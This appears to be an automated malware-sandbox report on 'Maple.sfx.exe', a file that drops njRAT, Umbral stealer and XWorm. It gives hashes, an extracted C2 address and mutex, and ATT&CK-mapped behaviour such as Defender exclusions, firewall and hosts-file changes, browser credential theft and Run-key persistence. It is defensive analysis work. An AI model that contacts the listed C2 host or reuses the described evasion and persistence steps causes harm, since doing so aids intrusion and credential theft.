njrat | 5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2

Analysis

max time kernel
149s
max time network
150s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
15-12-2024 05:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Maple.sfx.exe
Size

49.9MB
MD5

b6eb7b6c81c32e94112f00a4bd7fbc80
SHA1

328d30384ac99a4b24ebb78fe1ccde41444191a7
SHA256

5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2
SHA512

94e1d9a2899f7d2a210dc76615923be8475a8f89c9484d56f3ee2c9c28cf75a13051df8dd068835261bcab62e12a4c57bbb41efa0b7783b8b1138b314649f003
SSDEEP

1572864:wOyrjq1zExjMkfCfYFvWExN+ZJupU485C3Kc68:wOscE9Mkfnb1pUTC3P68

Score

10^/10

njrat umbral xworm discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x004f00000004612f-45.dat	family_umbral
behavioral2/memory/4356-55-0x000002BF7FBB0000-0x000002BF7FBF0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0028000000046142-85.dat	family_xworm
behavioral2/memory/2896-87-0x0000000000880000-0x0000000000890000-memory.dmp	family_xworm

Njrat family
njrat
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2940	powershell.exe
388	powershell.exe
4736	powershell.exe
5336	powershell.exe
4128	powershell.exe
1112	powershell.exe
1528	powershell.exe
4452	powershell.exe
3368	powershell.exe
884	powershell.exe
2412	powershell.exe
5004	powershell.exe
920	powershell.exe
980	powershell.exe
1752	powershell.exe
4864	powershell.exe
5580	powershell.exe
2584	powershell.exe
4292	powershell.exe
4592	powershell.exe
5160	powershell.exe
5896	powershell.exe
2068	powershell.exe
3336	powershell.exe
236	powershell.exe
5712	powershell.exe
2432	powershell.exe
4880	powershell.exe
2556	powershell.exe
4956	powershell.exe
5884	powershell.exe
5136	powershell.exe
1792	powershell.exe
704	powershell.exe
5612	powershell.exe
216	powershell.exe
5372	powershell.exe
3392	powershell.exe
2628	powershell.exe
4536	powershell.exe
4308	powershell.exe
1960	powershell.exe
3116	powershell.exe
3460	powershell.exe
5276	powershell.exe
4936	powershell.exe
3104	powershell.exe
3048	powershell.exe
780	powershell.exe
4784	powershell.exe
116	powershell.exe
5980	powershell.exe
5228	powershell.exe
1872	powershell.exe
3664	powershell.exe
768	powershell.exe
2088	powershell.exe
2556	powershell.exe
5344	powershell.exe
4088	powershell.exe
1128	powershell.exe
2784	powershell.exe
2332	powershell.exe
3392	powershell.exe

Drops file in Drivers directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5900	netsh.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	Maple.sfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	loader.exe

Executes dropped EXE 64 IoCs

pid	Process
3704	loader.exe
2980	Server.exe
4356	Maple.exe
4616	loader.exe
3216	Server.exe
2896	conhost.exe
3560	Server.exe
768	Server.exe
2480	conhost.exe
4760	Maple.exe
5816	loader.exe
3956	Server.exe
4184	Server.exe
4856	conhost.exe
1560	Maple.exe
5836	loader.exe
2304	server.exe
5568	Server.exe
4868	Maple.exe
5504	loader.exe
5716	Server.exe
2068	Maple.exe
3724	loader.exe
4488	Server.exe
3228	Maple.exe
3616	loader.exe
1720	Server.exe
2444	Maple.exe
3548	loader.exe
5812	Server.exe
5096	Maple.exe
4328	loader.exe
1280	Ondrive.exe
1856	Server.exe
5204	Maple.exe
5056	loader.exe
5760	Server.exe
1796	Maple.exe
5944	loader.exe
4640	Server.exe
4904	Maple.exe
6088	loader.exe
4388	Server.exe
4036	Maple.exe
1372	loader.exe
4032	Server.exe
4804	Maple.exe
5480	loader.exe
5172	Server.exe
2604	Maple.exe
3080	loader.exe
3276	Server.exe
5804	Maple.exe
3212	loader.exe
2440	Server.exe
5504	Maple.exe
4500	loader.exe
2308	Server.exe
4984	Maple.exe
948	loader.exe
556	Server.exe
5484	Maple.exe
3900	loader.exe
1964	Server.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 40 IoCs

Web Service

T1102

flow	ioc
106	discord.com
148	discord.com
172	discord.com
81	discord.com
113	discord.com
122	discord.com
149	discord.com
189	discord.com
63	discord.com
88	discord.com
98	discord.com
31	discord.com
87	discord.com
142	discord.com
158	discord.com
20	discord.com
64	discord.com
133	discord.com
159	discord.com
165	discord.com
179	discord.com
38	discord.com
12	discord.com
72	discord.com
105	discord.com
11	discord.com
71	discord.com
80	discord.com
97	discord.com
123	discord.com
132	discord.com
141	discord.com
166	discord.com
19	discord.com
180	discord.com
39	discord.com
112	discord.com
173	discord.com
190	discord.com
30	discord.com

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
60	ip-api.com
84	ip-api.com
169	ip-api.com
176	ip-api.com
154	ip-api.com
162	ip-api.com
6	ip-api.com
67	ip-api.com
75	ip-api.com
127	ip-api.com
184	ip-api.com
91	ip-api.com
102	ip-api.com
119	ip-api.com
138	ip-api.com
145	ip-api.com
193	ip-api.com
16	ip-api.com
24	ip-api.com
35	ip-api.com
109	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 62 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.sfx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 40 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5452	PING.EXE
4976	PING.EXE
5040	cmd.exe
3740	cmd.exe
5572	cmd.exe
5456	cmd.exe
5360	PING.EXE
1176	cmd.exe
5904	cmd.exe
324	PING.EXE
4700	cmd.exe
2328	PING.EXE
544	cmd.exe
4128	PING.EXE
5820	cmd.exe
5512	cmd.exe
332	PING.EXE
1684	PING.EXE
3260	cmd.exe
3672	PING.EXE
5896	PING.EXE
5932	cmd.exe
2784	PING.EXE
236	cmd.exe
5656	PING.EXE
3276	cmd.exe
5360	PING.EXE
1892	cmd.exe
3420	PING.EXE
4508	PING.EXE
3176	cmd.exe
5876	cmd.exe
5268	cmd.exe
2348	cmd.exe
1672	PING.EXE
3052	PING.EXE
980	PING.EXE
4728	cmd.exe
552	PING.EXE
5720	PING.EXE

Detects videocard installed 1 TTPs 20 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2828	wmic.exe
2124	wmic.exe
3528	wmic.exe
3672	wmic.exe
6108	wmic.exe
5060	wmic.exe
5168	wmic.exe
64	wmic.exe
2624	wmic.exe
4272	wmic.exe
440	wmic.exe
5688	wmic.exe
5688	wmic.exe
4284	wmic.exe
1528	wmic.exe
2344	wmic.exe
2420	wmic.exe
3236	wmic.exe
3532	wmic.exe
5196	wmic.exe

Runs ping.exe 1 TTPs 20 IoCs

Remote System Discovery

T1018

pid	Process
5452	PING.EXE
1684	PING.EXE
5360	PING.EXE
552	PING.EXE
4508	PING.EXE
324	PING.EXE
5656	PING.EXE
3672	PING.EXE
2328	PING.EXE
5360	PING.EXE
5720	PING.EXE
3420	PING.EXE
4128	PING.EXE
4976	PING.EXE
5896	PING.EXE
1672	PING.EXE
332	PING.EXE
3052	PING.EXE
980	PING.EXE
2784	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5576	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2896	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5072	wmic.exe
5072	wmic.exe
5072	wmic.exe
5072	wmic.exe
4356	Maple.exe
2412	powershell.exe
2412	powershell.exe
5012	powershell.exe
5012	powershell.exe
5136	powershell.exe
5136	powershell.exe
3696	powershell.exe
3696	powershell.exe
5004	powershell.exe
5004	powershell.exe
920	powershell.exe
2472	wmic.exe
2472	wmic.exe
2472	wmic.exe
2472	wmic.exe
920	powershell.exe
1500	wmic.exe
1500	wmic.exe
1500	wmic.exe
1500	wmic.exe
5464	wmic.exe
5464	wmic.exe
5464	wmic.exe
5464	wmic.exe
4736	powershell.exe
4736	powershell.exe
3392	powershell.exe
3392	powershell.exe
4284	wmic.exe
4284	wmic.exe
4284	wmic.exe
4284	wmic.exe
980	powershell.exe
980	powershell.exe
3496	wmic.exe
3496	wmic.exe
3496	wmic.exe
3496	wmic.exe
4868	Maple.exe
5896	powershell.exe
5896	powershell.exe
216	powershell.exe
216	powershell.exe
4932	powershell.exe
4932	powershell.exe
1300	powershell.exe
1300	powershell.exe
5968	wmic.exe
5968	wmic.exe
5968	wmic.exe
5968	wmic.exe
5932	wmic.exe
5932	wmic.exe
5932	wmic.exe
5932	wmic.exe
560	wmic.exe
560	wmic.exe
560	wmic.exe
560	wmic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4356	Maple.exe
Token: SeDebugPrivilege	2896	conhost.exe
Token: SeIncreaseQuotaPrivilege	5072	wmic.exe
Token: SeSecurityPrivilege	5072	wmic.exe
Token: SeTakeOwnershipPrivilege	5072	wmic.exe
Token: SeLoadDriverPrivilege	5072	wmic.exe
Token: SeSystemProfilePrivilege	5072	wmic.exe
Token: SeSystemtimePrivilege	5072	wmic.exe
Token: SeProfSingleProcessPrivilege	5072	wmic.exe
Token: SeIncBasePriorityPrivilege	5072	wmic.exe
Token: SeCreatePagefilePrivilege	5072	wmic.exe
Token: SeBackupPrivilege	5072	wmic.exe
Token: SeRestorePrivilege	5072	wmic.exe
Token: SeShutdownPrivilege	5072	wmic.exe
Token: SeDebugPrivilege	5072	wmic.exe
Token: SeSystemEnvironmentPrivilege	5072	wmic.exe
Token: SeRemoteShutdownPrivilege	5072	wmic.exe
Token: SeUndockPrivilege	5072	wmic.exe
Token: SeManageVolumePrivilege	5072	wmic.exe
Token: 33	5072	wmic.exe
Token: 34	5072	wmic.exe
Token: 35	5072	wmic.exe
Token: 36	5072	wmic.exe
Token: SeIncreaseQuotaPrivilege	5072	wmic.exe
Token: SeSecurityPrivilege	5072	wmic.exe
Token: SeTakeOwnershipPrivilege	5072	wmic.exe
Token: SeLoadDriverPrivilege	5072	wmic.exe
Token: SeSystemProfilePrivilege	5072	wmic.exe
Token: SeSystemtimePrivilege	5072	wmic.exe
Token: SeProfSingleProcessPrivilege	5072	wmic.exe
Token: SeIncBasePriorityPrivilege	5072	wmic.exe
Token: SeCreatePagefilePrivilege	5072	wmic.exe
Token: SeBackupPrivilege	5072	wmic.exe
Token: SeRestorePrivilege	5072	wmic.exe
Token: SeShutdownPrivilege	5072	wmic.exe
Token: SeDebugPrivilege	5072	wmic.exe
Token: SeSystemEnvironmentPrivilege	5072	wmic.exe
Token: SeRemoteShutdownPrivilege	5072	wmic.exe
Token: SeUndockPrivilege	5072	wmic.exe
Token: SeManageVolumePrivilege	5072	wmic.exe
Token: 33	5072	wmic.exe
Token: 34	5072	wmic.exe
Token: 35	5072	wmic.exe
Token: 36	5072	wmic.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeIncreaseQuotaPrivilege	2412	powershell.exe
Token: SeSecurityPrivilege	2412	powershell.exe
Token: SeTakeOwnershipPrivilege	2412	powershell.exe
Token: SeLoadDriverPrivilege	2412	powershell.exe
Token: SeSystemProfilePrivilege	2412	powershell.exe
Token: SeSystemtimePrivilege	2412	powershell.exe
Token: SeProfSingleProcessPrivilege	2412	powershell.exe
Token: SeIncBasePriorityPrivilege	2412	powershell.exe
Token: SeCreatePagefilePrivilege	2412	powershell.exe
